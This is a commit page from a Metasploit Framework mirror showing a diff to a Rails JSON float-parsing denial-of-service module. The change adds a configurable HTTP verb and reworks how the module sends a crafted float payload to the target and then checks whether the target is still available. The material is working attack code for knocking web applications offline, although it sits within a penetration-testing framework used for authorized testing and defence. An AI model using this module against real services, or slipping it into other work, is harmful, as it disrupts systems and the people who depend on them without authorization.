infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add user-controlled verbs. 

GET, HEAD, POST, and PROPFIND were tested on WebRick, all successful.
bug/bundler_fix
Tod Beardsley 2013-11-25 12:29:05 -06:00
parent 6a28aa298e
commit f311b0cd1e
No known key found for this signature in database
GPG Key ID: 1EFFB682ADB9F193
1 changed files with 9 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
modules/auxiliary/dos/http/rails_json_float_dos.rb
View File

@ -36,7 +36,8 @@ class Metasploit3 < Msf::Auxiliary
'DisclosureDate' => 'Nov 22 2013'))
register_options(
[
OptString.new('TARGETURI', [false, 'The URL of the vulnerable Rails application', '/'])
OptString.new('TARGETURI', [false, 'The URL of the vulnerable Rails application', '/']),
OptString.new('HTTPVERB', [false, 'The HTTP verb to use', 'POST'])
], self.class)
end
@ -44,6 +45,10 @@ class Metasploit3 < Msf::Auxiliary
normalize_uri(target_uri.path.to_s)
end
def verb
datastore['HTTPVERB'] || 'POST'
end
def digit_pattern
@digit_pattern ||= rand(10_000).to_s
end
@ -74,13 +79,13 @@ class Metasploit3 < Msf::Auxiliary
sploit = '['
sploit << evil_float_string
sploit << ']'
print_status "#{peer} - Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} request to #{uri}"
print_status "#{peer} - Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}"
target_available = true
begin
res = send_request_cgi(
{
'method' => 'POST',
'method' => verb,
'uri' => uri,
'ctype' => "application/json",
'data' => sploit
@ -101,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary
print_status "#{peer} - Checking availability"
begin
res = send_request_cgi({
'method' => 'POST',
'method' => verb,
'uri' => uri,
'ctype' => "application/json",
'data' => Rex::Text.rand_text_alpha(1+rand(64)).to_json